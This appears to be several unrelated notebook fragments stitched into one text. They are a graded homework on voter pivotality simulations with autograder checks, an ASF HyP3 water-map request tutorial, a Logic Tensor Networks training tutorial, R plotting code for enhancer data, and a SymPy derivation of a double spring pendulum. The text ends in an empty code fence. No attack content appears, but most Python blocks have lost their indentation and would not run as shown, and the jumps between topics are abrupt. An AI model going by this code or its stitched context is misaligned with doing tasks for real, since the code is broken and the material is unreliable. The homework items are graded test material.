A voter will be pivotal "overall" if they are pivotal within the group and the group is pivotal in the election. We can compute this by multiplying whether a voter is pivotal by whether their group is pivotal: the only voters who will be pivotal (represented by a 1) will have a 1 in both columns.
```
grouptrials = grouptrials.with_columns("overall piv 1",
grouptrials.column("voter piv1")*grouptrials.column("group piv1"),
"overall piv 2",
grouptrials.column("voter piv2")*grouptrials.column("group piv2"),
"overall piv 3",
grouptrials.column("voter piv3")*grouptrials.column("group piv3"))
grouptrials
```
**What is the probability of a voter in each group being pivotal?**
<!--
BEGIN QUESTION
name: q4e
-->
```
voter_1_pivotal_prob = sum(grouptrials.column("overall piv 1"))/ntrials
voter_2_pivotal_prob = ...
voter_3_pivotal_prob = ...
voter_1_pivotal_prob, voter_2_pivotal_prob, voter_3_pivotal_prob
grader.check("q4e")
```
We can graph the frequency with which a voter in a group is pivotal using `.hist("COLUMNNAME")`. Below, we graph the frequency of a voter in group one being pivotal. You can try graphing the frequency for voters in other groups by changing the column name below.
```
grouptrials.hist("overall piv 1")
```
How frequently do we see each combination of voter and group pivotal status? In the cells below, we calculate both the absolute frequency and the percentage of trials in which a voter is or is not pivotal within their group, and in which their group is or is not pivotal overall. For example, in the cell where `col_0` and `row_0` both equal 0, neither the voter nor the group was pivotal.
```
pd.crosstab(grouptrials.column("voter piv1"), grouptrials.column("group piv1"))
```
This cell mimics the above, except that by normalizing, we see the frequencies as a percentage overall.
```
pd.crosstab(grouptrials.column("voter piv1"), grouptrials.column("group piv1"), normalize=True)
```
Here is a function that ties it all together. It creates a table with group population parameter sizes as well as parameters for the probability of each kind of voter voting for candidate A.
```
def maketable(n1=50, n2=50, n3=50, p1=.4, p2=.5, p3=.6, ntrials=10000):
group1 = [np.random.binomial(n=n1, p=p1) for _ in range(ntrials)]
group2 = [np.random.binomial(n=n2, p=p2) for _ in range(ntrials)]
group3 = [np.random.binomial(n=n3, p=p3) for _ in range(ntrials)]
grouptrials = Table().with_columns("votes1",group1,
"votes2", group2,
"votes3",group3)
grouptrials = grouptrials.with_columns("voter piv1", 1*(grouptrials.column("votes1")==n1/2),
"voter piv2", 1*(grouptrials.column("votes2")==n2/2),
"voter piv3", 1*(grouptrials.column("votes3")==n3/2))
group1piv = 1*((grouptrials.column("votes2") <= n2/2)*(grouptrials.column("votes3") >= n3/2)+
(grouptrials.column("votes2") >= n2/2)*(grouptrials.column("votes3") <= n3/2))
    group2piv = 1*((grouptrials.column("votes1") <= n1/2)*(grouptrials.column("votes3") >= n3/2)+
                  (grouptrials.column("votes1") >= n1/2)*(grouptrials.column("votes3") <= n3/2))
    group3piv = 1*((grouptrials.column("votes1") <= n1/2)*(grouptrials.column("votes2") >= n2/2)+
                  (grouptrials.column("votes1") >= n1/2)*(grouptrials.column("votes2") <= n2/2))
grouptrials = grouptrials.with_columns("group piv1", group1piv,
"group piv2", group2piv,
"group piv3", group3piv)
grouptrials = grouptrials.with_columns("overall piv1",
grouptrials.column("voter piv1")*grouptrials.column("group piv1"),
"overall piv2",
grouptrials.column("voter piv2")*grouptrials.column("group piv2"),
"overall piv3",
grouptrials.column("voter piv3")*grouptrials.column("group piv3"))
return grouptrials
test = maketable()
test
```
What happens as we change the number of voters in each group relative to one another? In the following cell, use the sliders to change the number of voters in each group.
```
def voter_piv_rate(n1, n2, n3):
sims = maketable(n1, n2, n3)
for i in range(1,4):
print("Voter and Group are Both Pivotal Frequency", sum(sims.column(f"overall piv{i}"))/ntrials)
sims.hist(f"overall piv{i}")
plt.show()
interact(voter_piv_rate, n1=IntSlider(min=0,max=300, value=100), n2=IntSlider(min=0,max=300, value=100), n3=IntSlider(min=0,max=300, value=100))
```
<!-- BEGIN QUESTION -->
What happens as you change the sliders? Can you make the frequencies the same? How?
<!--
BEGIN QUESTION
name: q4f
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
If we keep the voter populations static, but change their probability of voting for candidate A, what happens?
```
def voter_piv_rate(p1, p2, p3):
sims = maketable(p1=p1, p2=p2, p3=p3)
for i in range(1,4):
print("Voter and Group are Both Pivotal Frequency", sum(sims.column(f"overall piv{i}"))/ntrials)
sims.hist(f"overall piv{i}")
plt.show()
return sims
interact(voter_piv_rate, p1=FloatSlider(min=0,max=1, value=.4, step=.1), p2=FloatSlider(min=0,max=1, value=.5, step=.1), p3=FloatSlider(min=0,max=1, value=.6, step=.1))
```
<!-- BEGIN QUESTION -->
What happens as you change the sliders? Can you make the frequencies the same? How?
<!--
BEGIN QUESTION
name: q4g
manual: true
-->
_Type your answer here, replacing this text._
<!-- END QUESTION -->
---
To double-check your work, the cell below will rerun all of the autograder tests.
```
grader.check_all()
```
## Submission
Make sure you have run all cells in your notebook in order before running the cell below, so that all images/graphs appear in the output. The cell below will generate a zip file for you to submit. **Please save before exporting!**
These are some submission instructions.
```
# Save your notebook first, then run this cell to export your submission.
grader.export()
```
# On Demand water maps via HyP3-watermap
This notebook will leverage either [ASF Search -- Vertex](https://search.asf.alaska.edu/#/) or the
[asf_search](https://github.com/asfadmin/Discovery-asf_search) Python package, and the
[HyP3 SDK](https://hyp3-docs.asf.alaska.edu/using/sdk/), to request On Demand surface water extent maps
from the custom [hyp3-watermap](https://hyp3-watermap.asf.alaska.edu) HyP3 deployment.
Water maps are generated from Sentinel-1 SLCs or GRDs by:
1. Applying Radiometric Terrain Correction (RTC)
2. Creating initial VV- and VH-based water maps using a thresholding approach
3. Refining the initial VV- and VH-based water maps using fuzzy logic
4. Combining the refined VV- and VH-based water maps into a final water map
For more information on the methods, or to modify the water map methods and process them locally, see the
[water-extent-map.ipynb](water-extent-map.ipynb) notebook.
## 0. Initial setup
Import and setup some helper functions for this notebook.
```
import ipywidgets as widgets
from IPython.display import display
def wkt_input():
wkt = widgets.Textarea(
placeholder='WKT of search area',
value='POLYGON((-91.185 36.6763,-86.825 36.6763,-86.825 38.9176,-91.185 38.9176,-91.185 36.6763))',
layout=widgets.Layout(width='100%'),
)
display(wkt)
return wkt
def file_ids_input():
file_ids = widgets.Textarea(
placeholder='copy-paste Sentinel-1 granule names or file ids here (One granule or id per line)',
layout=widgets.Layout(width='100%', height='12em'),
)
display(file_ids)
return file_ids
```
## 1. Search for Sentinel-1 scenes to process
You can search for Sentinel-1 scenes with either [ASF Search -- Vertex](https://search.asf.alaska.edu/#/) or the
[asf_search](https://github.com/asfadmin/Discovery-asf_search) Python package. Vertex provides an interactive,
feature rich experience, while `asf_search` allows searching programmatically and mirrors the vertex interface
as best it can. Section 1.1 describes using Vertex and Section 1.2 describes using `asf_search`.
*Note: only 1.1 or 1.2 needs to be executed to run this notebook.*
### 1.1 Search for Sentinel-1 scenes in Vertex
Requesting water map products from the custom HyP3-watermap deployment looks very similar to
[requesting On Demand RTC products](https://storymaps.arcgis.com/stories/2ead3222d2294d1fae1d11d3f98d7c35),
**except** instead of adding scenes to your On Demand queue, you'll:
1. add the scenes to your Downloads cart

2. open the Downloads Cart and select "Copy File Ids", and

3. paste the file ids into the text area that will appear below the next cell.
**Note:** Water maps currently require the Sentinel-1 source granules to be SLCs (preferred) or High-Res GRDs,
acquired using the IW beam mode, with both VV and VH polarizations. You can use the
[example search](https://search.asf.alaska.edu/#/?beamModes=IW&polarizations=VV%2BVH&productTypes=SLC&zoom=6.190¢er=-91.993,33.963&polygon=POLYGON((-91.185%2036.6763,-86.825%2036.6763,-86.825%2038.9176,-91.185%2038.9176,-91.185%2036.6763))&start=2021-05-30T00:00:00Z&resultsLoaded=true&granule=S1A_IW_GRDH_1SDV_20210607T234810_20210607T234835_038241_04834F_4BB6-GRD_HD&end=2021-06-07T23:59:59Z)
or jump-start your search in Vertex (with the required parameters already set) by following [this link](https://search.asf.alaska.edu/#/?dataset=Sentinel-1&productTypes=SLC&beamModes=IW&polarizations=VV%2BVH).
```
file_ids = file_ids_input()
all_granules = [f.strip().split('-')[0] for f in file_ids.value.splitlines()]
display(sorted(all_granules))
```
### 1.2 Search for Sentinel-1 scenes with `asf_search`
We'll use the geographic search functionality of `asf_search` to perform a search over an Area of
Interest (AOI) represented as [Well-Known Text (WKT)](https://en.wikipedia.org/wiki/Well-known_text_representation_of_geometry).
You can use the example WKT, or copy and paste your AOI's WKT, in the text area that will appear below the next cell.
```
wkt = wkt_input()
```
Water maps currently require the Sentinel-1 source granules to be SLCs (preferred) or High-Res GRDs,
acquired using the IW beam mode, with both VV and VH polarizations. The next cell performs a search over your AOI,
with these parameters set.
*Note: You will likely want to edit the `start` and `end` parameters.*
```
import asf_search
from asf_search.constants import SENTINEL1, SLC, IW, VV_VH
search_results = asf_search.geo_search(
platform=[SENTINEL1],
processingLevel=[SLC],
beamMode=[IW],
polarization=[VV_VH],
intersectsWith=wkt.value,
start='2021-05-30',
end='2021-06-08',
)
all_granules = {result.properties['sceneName'] for result in search_results}
display(sorted(all_granules))
```
## 2. Request water maps from HyP3-watermap
### 2.1 Connect to the HyP3-watermap deployment
Use the HyP3 SDK to connect to the custom deployment with your [NASA Earthdata login](https://urs.earthdata.nasa.gov/).
```
import hyp3_sdk
hyp3_watermap = hyp3_sdk.HyP3('https://hyp3-watermap.asf.alaska.edu', prompt=True)
```
### 2.2 Specify the custom water map parameters
Below is a dictionary representation of the possible customization options for a water-map job.
Importantly, this definition will be applied to each granule in our search results, so these
options will be used with each job we submit.
You may change any or all of them, and in particular, you will likely want to use the
`name` parameter to group each "batch" of jobs together and easily find them later.
```
job_definition = {
'name': 'water-map-example',
'job_type': 'WATER_MAP',
'job_parameters': {
'resolution': 30,
'speckle_filter': True,
'max_vv_threshold': -15.5,
'max_vh_threshold': -23.0,
'hand_threshold': 15.0,
'hand_fraction': 0.8,
'membership_threshold': 0.45,
}
}
```
### 2.3 Submit the jobs to the custom HyP3-watermap deployment
Using the job definition as defined above (make sure you run the cell!), this will submit a job for
each granule in the search results.
```
import copy
prepared_jobs = []
for granule in all_granules:
job = copy.deepcopy(job_definition)
job['job_parameters']['granules'] = [granule]
prepared_jobs.append(job)
jobs = hyp3_watermap.submit_prepared_jobs(prepared_jobs)
```
Once the jobs are submitted, you can watch for them to complete (it will take ~30 min for all jobs to finish).
```
jobs = hyp3_watermap.watch(jobs)
```
Or, you can come back later and find your jobs by name, and make sure they're finished
```
jobs = hyp3_watermap.find_jobs(name='water-map-example')
jobs = hyp3_watermap.watch(jobs)
```
Once all jobs are complete, you can download the products for each successful job
```
jobs.download_files('data/')
```
## Notes on viewing/evaluating the water map products
* All GeoTIFFs in the RTC products are Cloud-Optimized, including the water map files `*_WM.tif`, and will have overviews/pyramids.
**This means the `*_WM.tif`'s appear to have a significantly higher water extent than they do in reality until you zoom in.**
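For example, here is a minimal sketch using the `rasterio` package (an assumption: it is not used elsewhere in this notebook, and the file name below is a hypothetical placeholder) to list a water map's overview factors and read a reduced-resolution preview:
```
import rasterio

# Hypothetical path; substitute one of the *_WM.tif files downloaded to data/
wm_path = 'data/example_WM.tif'

with rasterio.open(wm_path) as src:
    print(src.overviews(1))   # decimation factors of the internal overviews
    preview = src.read(1, out_shape=(src.height // 8, src.width // 8))
print(preview.shape)
```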
# Learning in LTN
This tutorial explains how to learn some language symbols (predicates, functions, constants) using the satisfaction of a knowledgebase as an objective. It assumes basic familiarity with the first two tutorials on LTN (grounding symbols and connectives).
```
import logictensornetworks as ltn
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
```
We use the following simple example to illustrate learning in LTN.
The domain is the square $[0,4] \times [0,4]$. We have one example of the class $A$ and one example of the class $B$. The rest of the individuals are not labelled, but there are two assumptions:
- $A$ and $B$ are mutually exclusive,
- any two close points should share the same label.
```
points = np.array(
[[0.4,0.3],[1.2,0.3],[2.2,1.3],[1.7,1.0],[0.5,0.5],[0.3, 1.5],[1.3, 1.1],[0.9, 1.7],
[3.4,3.3],[3.2,3.3],[3.2,2.3],[2.7,2.0],[3.5,3.5],[3.3, 2.5],[3.3, 1.1],[1.9, 3.7],[1.3, 3.5],[3.3, 1.1],[3.9, 3.7]])
point_a = [3.3,2.5]
point_b = [1.3,1.1]
fig, ax = plt.subplots()
ax.set_xlim(0,4)
ax.set_ylim(0,4)
ax.scatter(points[:,0],points[:,1],color="black",label="unknown")
ax.scatter(point_a[0],point_a[1],color="blue",label="a")
ax.scatter(point_b[0],point_b[1],color="red",label="b")
ax.set_title("Dataset of individuals")
plt.legend();
```
We define the membership predicate $C(x,l)$, where $x$ is an individual and $l$ is a onehot label to denote the two classes. $C$ is approximated by a simple MLP. The last layer, that computes probabilities per class, uses a `softmax` activation, ensuring that the classes are mutually-exclusive.
We define the knowledgebase $\mathcal{K}$ composed of the following rules:
\begin{align}
& C(a,l_a)\\
& C(b,l_b)\\
\forall x_1,x_2,l\ \big(\mathrm{Sim}(x_1,x_2) & \rightarrow \big(C(x_1,l)\leftrightarrow C(x_2,l)\big)\big)
\end{align}
where $a$ and $b$ are the two individuals already classified; $x_1$,$x_2$ are variables ranging over all individuals; $l_a$, $l_b$ are the one-hot labels for $A$ and $B$; $l$ is a variable ranging over the labels. $\mathrm{Sim}$ is a predicate measuring similarity between two points. $\mathcal{G}(\mathrm{Sim}):\vec{u},\vec{v}\mapsto \exp(-\|\vec{u}-\vec{v} \|^2)$.
The objective is to learn the predicate $C$ to maximize the satisfaction of $\mathcal{K}$. If $\theta$ denotes the set of trainable parameters, the task is :
$$
\theta^\ast = \mathrm{argmax}_{\theta\in\Theta}\ \mathrm{SatAgg}_{\phi\in\mathcal{K}}\mathcal{G}_{\theta}(\phi)
$$
where $\mathrm{SatAgg}$ is an operator that aggregates the truth values of the formulas in $\mathcal{K}$ (if there are more than one formula).
To evaluate the grounding of each formula, one has to define the grounding of the non-logical symbols and of the operators.
```
class ModelC(tf.keras.Model):
def __init__(self):
super(ModelC, self).__init__()
self.dense1 = tf.keras.layers.Dense(5, activation=tf.nn.elu)
self.dense2 = tf.keras.layers.Dense(5, activation=tf.nn.elu)
self.dense3 = tf.keras.layers.Dense(2, activation=tf.nn.softmax)
def call(self, inputs):
"""inputs[0]: point, inputs[1]: onehot label"""
x, label = inputs[0], inputs[1]
x = self.dense1(x)
x = self.dense2(x)
prob = self.dense3(x)
return tf.math.reduce_sum(prob*label,axis=1)
C = ltn.Predicate(ModelC())
x1 = ltn.variable("x1",points)
x2 = ltn.variable("x2",points)
a = ltn.constant([3.3,2.5])
b = ltn.constant([1.3,1.1])
l_a = ltn.constant([1,0])
l_b = ltn.constant([0,1])
l = ltn.variable("l",[[1,0],[0,1]])
Sim = ltn.Predicate.Lambda(
lambda args: tf.exp(-1.*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1)))
)
similarities_to_a = Sim([x1,a])
fig, ax = plt.subplots()
ax.set_xlim(0,4)
ax.set_ylim(0,4)
ax.scatter(points[:,0],points[:,1],color="black")
ax.scatter(a[0],a[1],color="blue")
ax.set_title("Illustrating the similarities of each point to a")
for i, sim_to_a in enumerate(similarities_to_a):
plt.plot([points[i,0],a[0]],[points[i,1],a[1]], alpha=sim_to_a.numpy(),color="blue")
```
Notice the operator for equivalence $p \leftrightarrow q$; in LTN, it is simply implemented as $(p \rightarrow q)\land(p \leftarrow q)$ using one operator for conjunction and one operator for implication.
```
Not = ltn.Wrapper_Connective(ltn.fuzzy_ops.Not_Std())
And = ltn.Wrapper_Connective(ltn.fuzzy_ops.And_Prod())
Or = ltn.Wrapper_Connective(ltn.fuzzy_ops.Or_ProbSum())
Implies = ltn.Wrapper_Connective(ltn.fuzzy_ops.Implies_Reichenbach())
Equiv = ltn.Wrapper_Connective(ltn.fuzzy_ops.Equiv(ltn.fuzzy_ops.And_Prod(),ltn.fuzzy_ops.Implies_Reichenbach()))
Forall = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMeanError(p=2),semantics="forall")
Exists = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMean(p=6),semantics="exists")
```
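As a quick numerical sanity check of how the equivalence above behaves (a plain-Python sketch, not the LTN API, assuming `And_Prod` computes the product t-norm $a \cdot b$ and `Implies_Reichenbach` computes $1 - a + a\,b$; see `ltn.fuzzy_ops` for the exact definitions):
```python
# Plain-Python sketch of the assumed fuzzy operators.
def implies_reichenbach(a, b):
    return 1. - a + a * b          # Reichenbach implication

def and_prod(a, b):
    return a * b                   # product t-norm

def equiv(a, b):
    # p <-> q implemented as (p -> q) AND (q -> p)
    return and_prod(implies_reichenbach(a, b), implies_reichenbach(b, a))

print(equiv(0.9, 0.9))  # ~0.83: the two truth values agree, high equivalence
print(equiv(0.9, 0.1))  # ~0.19: the two truth values disagree, low equivalence
```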
If there are several closed formulas in $\mathcal{K}$, their truth values need to be aggregated.
We recommend using the generalized-mean-inspired operator `pMeanError`, already used to implement $\forall$.
The hyperparameter $p$ again allows flexibility in how strict the formula aggregation is ($p = 1$ corresponds to `mean`; $p \to +\infty$ corresponds to `min`).
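As a rough illustration of how $p$ affects the aggregation (a sketch using the usual definition $\mathrm{ApME}(a_1,\dots,a_n) = 1 - \big(\tfrac{1}{n}\sum_i (1-a_i)^p\big)^{1/p}$; check `ltn.fuzzy_ops.Aggreg_pMeanError` for the exact implementation):
```python
import numpy as np

def p_mean_error(truth_values, p):
    # 1 - ((1/n) * sum((1 - a_i)^p))^(1/p)
    a = np.asarray(truth_values, dtype=float)
    return 1. - np.mean((1. - a) ** p) ** (1. / p)

sats = [0.9, 0.8, 0.3]            # example truth values of three formulas
print(p_mean_error(sats, p=1))    # 0.667: plain mean of the truth values
print(p_mean_error(sats, p=20))   # ~0.34: close to min(sats), much stricter aggregation
```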
The knowledgebase should be written inside a function decorated with `@tf.function`. This TensorFlow decorator compiles the function into a callable (static) TensorFlow graph.
```
formula_aggregator = ltn.fuzzy_ops.Aggreg_pMeanError(p=2)
@tf.function
def axioms():
axioms = [
C([a,l_a]),
C([b,l_b]),
Forall(
[x1,x2,l],
Implies( Sim([x1,x2]),
Equiv(C([x1,l]),C([x2,l]))
)
)
]
kb_sat = formula_aggregator(tf.stack(axioms))
return kb_sat
```
**It is important to always run (forward pass) the knowledgebase once before training, as TensorFlow initializes weights and compiles the graph during the first call.**
```
axioms()
```
Finally, one can write a custom training loop in TensorFlow.
```
trainable_variables = C.trainable_variables
optimizer = tf.keras.optimizers.Adam(learning_rate=0.001)
for epoch in range(2000):
with tf.GradientTape() as tape:
loss = 1. - axioms()
grads = tape.gradient(loss, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
if epoch%200 == 0:
print("Epoch %d: Sat Level %.3f"%(epoch, axioms()))
print("Training finished at Epoch %d with Sat Level %.3f"%(epoch, axioms()))
```
After a few epochs, the system has learned to identify samples close to the point $a$ (resp. $b$) as belonging to class $A$ (resp. $B$) based on the rules of the knowledgebase.
```
fig = plt.figure(figsize=(10,3))
fig.add_subplot(1,2,1)
plt.scatter(x1[:,0],x1[:,1],c=C([x1,l_a]).numpy(),vmin=0,vmax=1)
plt.title("C(x,l_a)")
plt.colorbar()
fig.add_subplot(1,2,2)
plt.scatter(x1[:,0],x1[:,1],c=C([x1,l_b]).numpy(),vmin=0,vmax=1)
plt.title("C(x,l_b)")
plt.colorbar()
plt.show();
```
## Special Cases
### Variables grounded by batch
When working with batches of data, ground the variables with different values at each step:
1. Pass the values in arguments to the knowledgebase function,
2. Create the ltn variables within the function.
```python
@tf.function
def axioms(data_x, data_y):
x = ltn.variable("x", data_x)
y = ltn.variable("y", data_y)
return Forall([x,y],P([x,y]))
...
for epoch in range(epochs):
for batch_x, batch_y in dataset:
with tf.GradientTape() as tape:
loss_value = 1. - axioms(batch_x, batch_y)
grads = tape.gradient(loss_value, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
```
### Variables denoting a sequence of trainable constants
When a variable denotes a sequence of trainable constants (embeddings):
1. Do not create the variable outside the scope of `tf.GradientTape()`,
2. Create the variable within the training step function.
```python
c1 = ltn.constant([2.1,3], trainable=True)
c2 = ltn.constant([4.5,0.8], trainable=True)
# Do not assign the variable here. Tensorflow would not keep track of the
# gradients between c1/c2 and x during training.
# x = ltn.variable("x", tf.stack([c1,c2]))
...
@tf.function
def axioms():
# The assignation must be done within the tf.GradientTape,
# inside of the training step function.
x = ltn.variable("x",tf.stack([c1,c2]))
return Forall(x,P(x))
...
for epoch in range(epochs):
with tf.GradientTape() as tape:
loss_value = 1. - axioms()
grads = tape.gradient(loss_value, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
```
```
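# Load the enhancer annotation table and the FACS proportional-expression table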
enhancer_annotation_FACS = read.csv("~/Desktop/Divya/Thesis/enhancers/enhancer_annotation_FACS.csv")
FACS_prop = read.csv("~/Desktop/Divya/Thesis/enhancers/FACS_prop.csv")
head(FACS_prop)
df = data.frame(x1prop = c(FACS_prop$X1.prop, subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$X1.prop,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$X1.prop,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$X1.prop))
type = c(rep("All", length(FACS_prop$X1.prop)), rep("Both", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$X1.prop)),
rep("H3K27ac", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$X1.prop)),
rep("H3K4me1", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$X1.prop))
)
df$type = type
library(ggpubr)
options(repr.plot.width = 9, repr.plot.height = 7)
my_comparisons = list( c("chip", "k27ac"), c("k27ac", "k4me1"), c("chip", "k4me1"))
p = ggplot(df, aes(x=type, y=x1prop, fill=type)) +geom_jitter(size=0.3, alpha=0.3) + geom_violin(alpha=0.5)
p = p + theme_minimal()
p = p + scale_fill_manual(name=" ", labels=c("Combined", "Single H3K27ac", "Single H3K4me1", "All"), values=c("orange", "lightblue", "navyblue", "grey"))
p = p + theme(plot.title = element_text(hjust = 0.5), title=element_text(size=30), axis.text.y=element_text(size=30), axis.text.x=element_text(size=25), axis.title=element_text(size=30), legend.title=element_text(size=30), legend.text=element_text(size=25), legend.position="top")
p = p + xlab("\nX1 proportional expression")+ylab("Frequency\n")
p = p + guides(fill=guide_legend(nrow=2,byrow=TRUE))
#p = p + theme(plot.title = element_text(hjust = 0.5), title=element_text(size=30), axis.text.y=element_text(size=30), axis.text.x=element_text(size=25), axis.title=element_text(size=35), legend.position="none", legend.title=element_text(), legend.text=element_text(size=25))
#p = p + scale_fill_manual(name=" ", values=c("navyblue", "#2B83BA", "orange"))
#p = p + scale_x_discrete(labels=c("Combined", "Single H3K27ac", "Single H3K4me1"))
#p = p + xlab("") + ylab("log2 fold change lpt(RNAi)\nH3K4me1\n")+stat_compare_means(comparisons = my_comparisons, size=8)
#p = p + scale_y_continuous(trans="log10")+stat_compare_means(label.y = 6.2, label.x=2.2, size=10)+stat_compare_means(comparisons = my_comparisons, size=8)
p = p + geom_hline(yintercept=0.33, linetype="dashed", size=1.25)
p
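# Rebuild df with the distance-to-TSS values for each enhancer class (column is still named x1prop)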
df = data.frame(x1prop = c(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$distanceToTSS,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$distanceToTSS,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$distanceToTSS))
type = c(rep("Both", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$distanceToTSS)),
rep("H3K27ac", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$distanceToTSS)),
rep("H3K4me1", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$distanceToTSS))
)
df$type = type
library(ggplot2)
options(repr.plot.width = 9, repr.plot.height = 7)
p = ggplot(df, aes(x=abs(x1prop), fill=type))+geom_histogram(bins=40)
p = p + scale_fill_manual(name=" ", labels=c("Both", "H3K27ac", "H3K4me1"), values=c("#00AFBB", "#E7B800", "#FC4E07"))
p = p + theme(plot.title = element_text(hjust = 0.5),
title=element_text(size=16),
axis.text.y=element_text(size=16),
axis.text.x=element_text(size=16),
axis.title=element_text(size=16),
legend.title=element_text(size=20),
legend.text=element_text(size=20),
legend.position = "top",
axis.title.x = element_text(size = 22),
axis.title.y = element_text(size = 22),
plot.margin = margin(0, 0, 0, 1, "cm"))
plt1 = p + xlab("\nDistance to TSS (bp)")+ylab("Frequency\n")+xlim(0,50000)
#p = p + geom_vline(xintercept=10, col="black", size=1.2, linetype="dashed")
ggsave("en.pdf", plt1)
plt1
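# Violin plot (ggpubr) of the same distance-to-TSS values by enhancer class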
fs = 16
library(ggpubr)
options(repr.plot.width = 9, repr.plot.height = 7)
plt2=ggviolin(df, x = "type", y = "x1prop",
fill="type", palette = c("#00AFBB", "#E7B800", "#FC4E07"),
width=0.9,
xlab="", ylab="Frequency\n",
legend.title = "",
legend = "top",
font.main = fs,
font.submain = fs,
font.caption = fs,
font.legend = 20,
font.y = 22,
font.label = list(size = fs, color = "black"))
plt2 = plt2 + theme(axis.text.x = element_text(size=fs), axis.text.y = element_text(size=fs)) + ylim(0, 60000)
ggsave("violin.pdf", plt2)
plt2
```
```
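# Double spring pendulum (two rods of variable length r0, r1 on springs):
# derive the equations of motion symbolically with SymPy via the Euler-Lagrange equations.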
import sympy as sp
from sympy.physics.mechanics import dynamicsymbols
m0, m1, l0, l1, k0, k1, t, g = sp.symbols(r'm_0 m_1 l_0 l_1 k_0 k_1 t g')
theta0 = sp.Function(r'\theta_0')(t)
theta1 = sp.Function(r'\theta_1')(t)
r0 = sp.Function(r'r_0')(t)
r1 = sp.Function(r'r_1')(t)
dtheta0 = theta0.diff(t)
dtheta1 = theta1.diff(t)
dr0 = r0.diff(t)
dr1 = r1.diff(t)
I0 = m0 * r0 ** 2 / 12
I1 = m1 * r1 ** 2 / 12
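# Cartesian positions of the centres of mass of the two rods (origin at the pivot, y pointing up)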
x0 = (r0 / 2) * sp.sin(theta0)
y0 = -(r0 / 2) * sp.cos(theta0)
x1 = r0 * sp.sin(theta0) + (r1 / 2) * sp.sin(theta1)
y1 = -r0 * sp.cos(theta0) - (r1 / 2) * sp.cos(theta1)
spring_potential = k0 * (r0 - l0) ** 2 / 2 + k1 * (r1 - l1) ** 2 / 2
gravitational_potential = (m0 * y0 + m1 * y1) * g
kinetic = m0 * (x0.diff(t) ** 2 + y0.diff(t) ** 2) / 2 + m1 * (x1.diff(t) ** 2 + y1.diff(t) ** 2) / 2 + (I0 / 2) * theta0.diff(t) ** 2 + (I1 / 2) * theta1.diff(t) ** 2
L = kinetic - (spring_potential + gravitational_potential)
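# Euler-Lagrange equations d/dt(dL/dq_dot) = dL/dq for each generalised coordinate r0, r1, theta0, theta1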
EL_r0 = sp.Eq(L.diff( dr0).diff(t),L.diff( r0)).simplify()
EL_r1 = sp.Eq(L.diff( dr1).diff(t),L.diff( r1)).simplify()
EL_theta0 = sp.Eq(L.diff(dtheta0).diff(t),L.diff(theta0)).simplify()
EL_theta1 = sp.Eq(L.diff(dtheta1).diff(t),L.diff(theta1)).simplify()
soln = sp.solve(
[EL_r0, EL_r1, EL_theta0, EL_theta1],
[r0.diff(t, 2), r1.diff(t, 2), theta0.diff(t, 2), theta1.diff(t, 2)]
)
keys = list(soln.keys())
soln_list = [sp.Eq(key,soln[key]) for key in keys]
ddr0 = soln_list[0].simplify()
ddr1 = soln_list[1].simplify()
ddtheta0 = soln_list[2].simplify()
ddtheta1 = soln_list[3].simplify()
subs_dict = {
r0.diff(t ):sp.Function( r'\dot{r}_0')(t),
r1.diff(t ):sp.Function( r'\dot{r}_1')(t),
theta0.diff(t ):sp.Function( r'\dot{\theta}_0')(t),
theta1.diff(t ):sp.Function( r'\dot{\theta}_1')(t),
r0.diff(t, 2):sp.Function( r'\ddot{r}_0')(t),
r1.diff(t, 2):sp.Function( r'\ddot{r}_1')(t),
theta0.diff(t, 2):sp.Function(r'\ddot{\theta}_0')(t),
theta1.diff(t, 2):sp.Function(r'\ddot{\theta}_1')(t)
}
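# Render the solved accelerations as plain-text expressions (strip the (t) arguments and
# LaTeX-style names) so they can be pasted outside SymPy.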
def convert(_):
return str(_.subs(subs_dict).rhs).replace('(t)','').replace('\\left','').replace('\\right','').replace('\\theta','theta').replace('\\dot{theta}','dtheta').replace('\\dot{r}','dr').replace('_','').replace(' - ','-').replace(' + ','+')
convert(ddr0)
convert(ddr1)
convert(ddtheta0)
convert(ddtheta1)
```
```js
